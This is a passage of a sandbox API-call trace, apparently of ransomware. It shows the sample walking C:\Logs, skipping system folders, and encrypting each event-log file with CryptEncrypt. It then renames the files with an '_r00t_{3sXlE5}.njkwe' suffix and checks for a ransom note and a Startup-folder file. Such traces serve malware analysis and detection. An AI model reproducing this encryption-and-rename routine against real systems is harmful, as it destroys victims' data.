lpOverlapped=0x0) returned 1 [0066.473] CloseHandle (hObject=0x428) returned 1 [0066.514] GetProcessHeap () returned 0xbe0000 [0066.514] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.514] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx_r00t_{3sXlE5}.njkwe") returned 80 [0066.514] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.514] GetProcessHeap () returned 0xbe0000 [0066.514] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.514] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8ebf6d7, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc8ebf6d7, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", cAlternateFileName="MICA77~1.EVT")) returned 1 [0066.514] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", lpString2="Windows") returned -1 [0066.514] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", lpString2="$Recycle.bin") returned 1 [0066.514] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", lpString2="System Volume Information") returned -1 [0066.514] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", lpString2="Program Files") returned -1 [0066.515] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", lpString2="Program Files (x86)") returned -1 [0066.515] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 68 [0066.515] StrStrIW (lpFirst="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", lpSrch=".njkwe") returned 0x0 [0066.515] lstrcmpW (lpString1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.515] lstrcmpW (lpString1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", lpString2="taridd") returned -1 [0066.515] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.515] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.515] GetTickCount () returned 0x1151077 [0066.515] GetTickCount () returned 0x1151077 [0066.515] GetTickCount () returned 0x1151077 [0066.515] GetTickCount () returned 0x1151077 [0066.515] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.515] GetProcessHeap () returned 0xbe0000 [0066.515] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.515] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.517] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.517] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.517] GetProcessHeap () returned 0xbe0000 [0066.517] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.517] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.517] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.518] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.518] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.518] CloseHandle (hObject=0x428) returned 1 [0066.520] GetProcessHeap () returned 0xbe0000 [0066.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.520] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx_r00t_{3sXlE5}.njkwe") returned 88 [0066.520] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.520] GetProcessHeap () returned 0xbe0000 [0066.520] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.521] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5090f75d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5090f75d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", cAlternateFileName="MI1E8D~1.EVT")) returned 1 [0066.521] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", lpString2="Windows") returned -1 [0066.521] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0066.521] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", lpString2="System Volume Information") returned -1 [0066.521] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", lpString2="Program Files") returned -1 [0066.521] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0066.521] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 65 [0066.521] StrStrIW (lpFirst="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0066.521] lstrcmpW (lpString1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.521] lstrcmpW (lpString1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", lpString2="taridd") returned -1 [0066.521] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.521] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.521] GetTickCount () returned 0x1151077 [0066.521] GetTickCount () returned 0x1151077 [0066.521] GetTickCount () returned 0x1151077 [0066.521] GetTickCount () returned 0x1151077 [0066.521] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.521] GetProcessHeap () returned 0xbe0000 [0066.521] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.521] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.523] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.523] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.523] GetProcessHeap () returned 0xbe0000 [0066.523] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.523] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.524] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.524] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.524] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.524] CloseHandle (hObject=0x428) returned 1 [0066.526] GetProcessHeap () returned 0xbe0000 [0066.526] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.526] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 85 [0066.526] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.527] GetProcessHeap () returned 0xbe0000 [0066.527] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.527] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd75102f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcd75102f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", cAlternateFileName="MID067~1.EVT")) returned 1 [0066.527] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", lpString2="Windows") returned -1 [0066.527] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0066.527] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", lpString2="System Volume Information") returned -1 [0066.527] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", lpString2="Program Files") returned -1 [0066.527] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0066.527] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 63 [0066.527] StrStrIW (lpFirst="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0066.527] lstrcmpW (lpString1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.527] lstrcmpW (lpString1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", lpString2="taridd") returned -1 [0066.527] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.527] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.528] GetTickCount () returned 0x1151077 [0066.528] GetTickCount () returned 0x1151077 [0066.528] GetTickCount () returned 0x1151077 [0066.528] GetTickCount () returned 0x1151077 [0066.528] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.528] GetProcessHeap () returned 0xbe0000 [0066.528] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.528] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.530] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.530] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.530] GetProcessHeap () returned 0xbe0000 [0066.530] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.530] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.530] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.530] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.531] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.531] CloseHandle (hObject=0x428) returned 1 [0066.532] GetProcessHeap () returned 0xbe0000 [0066.532] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.532] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 83 [0066.532] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.533] GetProcessHeap () returned 0xbe0000 [0066.533] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.533] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50be4414, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50be4414, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", cAlternateFileName="MIDE4D~1.EVT")) returned 1 [0066.533] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", lpString2="Windows") returned -1 [0066.533] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", lpString2="$Recycle.bin") returned 1 [0066.533] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", lpString2="System Volume Information") returned -1 [0066.533] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", lpString2="Program Files") returned -1 [0066.533] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", lpString2="Program Files (x86)") returned -1 [0066.533] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 54 [0066.533] StrStrIW (lpFirst="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", lpSrch=".njkwe") returned 0x0 [0066.533] lstrcmpW (lpString1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.533] lstrcmpW (lpString1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", lpString2="taridd") returned -1 [0066.533] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.533] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.534] GetTickCount () returned 0x1151077 [0066.534] GetTickCount () returned 0x1151077 [0066.534] GetTickCount () returned 0x1151077 [0066.534] GetTickCount () returned 0x1151077 [0066.534] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.534] GetProcessHeap () returned 0xbe0000 [0066.534] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.534] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.536] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.536] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.536] GetProcessHeap () returned 0xbe0000 [0066.536] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.536] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.536] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.537] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.537] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.537] CloseHandle (hObject=0x428) returned 1 [0066.538] GetProcessHeap () returned 0xbe0000 [0066.538] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.539] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx_r00t_{3sXlE5}.njkwe") returned 74 [0066.539] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.539] GetProcessHeap () returned 0xbe0000 [0066.539] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.539] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50be4414, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50be4414, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", cAlternateFileName="MI36C5~1.EVT")) returned 1 [0066.539] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", lpString2="Windows") returned -1 [0066.539] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0066.539] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", lpString2="System Volume Information") returned -1 [0066.539] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", lpString2="Program Files") returned -1 [0066.539] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0066.539] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 59 [0066.539] StrStrIW (lpFirst="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0066.540] lstrcmpW (lpString1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.540] lstrcmpW (lpString1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", lpString2="taridd") returned -1 [0066.540] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.540] CreateFileW 